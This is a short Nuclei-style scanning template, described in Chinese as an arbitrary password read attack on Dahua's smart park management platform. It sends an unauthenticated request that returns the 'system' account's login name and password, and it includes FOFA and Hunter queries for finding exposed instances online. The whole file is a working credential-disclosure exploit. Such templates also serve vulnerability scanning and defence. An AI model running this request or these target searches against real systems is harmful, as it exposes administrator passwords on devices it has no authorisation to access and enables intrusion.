id: dahua-loginpass-leak

info:
  name: dahua-loginpass-leak
  author: user
  severity: high
  description: 大华智慧园区任意密码读取攻击
  reference:
    - https://cn-sec.com/archives/1959355.html
    - https://blog.csdn.net/weixin_43981050/article/details/132276011
  tags: dahua
  metadata:
    fofa-query: 'app="dahua-智慧园区综合管理平台"'
    hunter-query: 'web.body="/WPMS/asset/lib/gridster/"'

requests:
  - method: GET
    path: 
      - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - '"loginName":"system","loginPass"'